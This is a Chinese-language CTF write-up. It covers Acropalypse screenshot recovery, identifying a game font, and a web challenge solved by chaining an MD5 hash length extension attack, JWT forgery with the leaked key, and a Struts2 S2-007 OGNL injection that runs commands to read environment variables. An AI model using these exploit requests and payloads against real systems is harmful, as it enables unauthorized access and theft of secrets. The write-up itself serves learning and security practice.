snippingTools

Windows 11 截图工具的cve,所用工具:frankthetank-music/Acropalypse-Multi-Tool: Easily detect and restore Acropalypse vulnerable PNG and GIF files with simple Python GUI. (github.com)。在Windows环境下报错,Linux下可执行,折腾了老半天,烦。

old language

Google识图,找到字体:Dovahkiin 字体 (fonts2u.com),对应一下即可

jwt2structs

查看源代码

1
2
3
4
<body>
    <!-- JWT_key.php -->
    You are now logged in as user. Try to become admin.
</body>

访问/JWT_key.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
         if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}

第一次遇到哈希长度扩展攻击。使用工具hashpump

1
2
3
4
5
6
7
hashpump
Input Signature: e6ccbf12de9d33ec27a5bcfb6a3293df
Input Data: root
Input Key Length: 19 # 即14字符的salt+5字符的"admin"
Input Data to Add: root
6aa42454d4236337702b321ee8841237
root\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00root

\x修改为%,发包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /JWT_key.php HTTP/1.1
Host: 140.210.223.216:55557
Content-Length: 155
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51
Origin: http://140.210.223.216:55557
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://140.210.223.216:55557/JWT_key.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: digest=6aa42454d4236337702b321ee8841237
Connection: close

password=root%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00root&username=admin

成功回显The secret_key is sk-he00lctf3r。btw这里折腾了很久,实在搞不懂为啥同样的参数生成同样的payload(这里保证没问题),下午打不通晚上打通了。本地测试的时候password变量不小心多了个换行,以为是ide贴心的自动换行方便看,也在本地折腾了很久,真的绝了

回到初始页面,提示admin登录,且题目提示jwt,使用一下在线工具:JSON Web Tokens - jwt.io。原cookie:

1
access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjYwOTQ4fQ.l3rpRNUC9DwgI74bGFnNier8byigwXzRyIDWv-w5oOY
1
2
3
4
5
PAYLOAD:DATA
{
  "sub": "user",
  "exp": 2006260948
}

将user修改为admin,secret_key填入VERIFY SIGNATURE,获得新cookie

1
access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MjAwNjIyNjQ3Nn0.829HbL3GslmimsCi_eHRuGusewFL4dul4uYE69VOQ_k

修改cookie后发包,直接访问到/admiiiiiiiiiiin/页面。根据题目提示可知是Structs2相关漏洞。翻看Structs2相关漏洞可知为S2-007,利用类型验证转换出错执行恶意代码。S2-007远程代码执行复现-腾讯云开发者社区-腾讯云 (tencent.com)

image

age测试:'+(1+1)+',返回11,验证漏洞存在成功。执行payload:

1
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /proc/self/environ').getInputStream())) + '

获得环境变量中的flag:FLAG=flag{7r0m_jwt_t0_struts2}

话说还是老样子先cat了/etc/passwd,然后居然cat不到/flag或者/flag.txt,不过想了想环境变量也是老朋友了,cat一下就找到了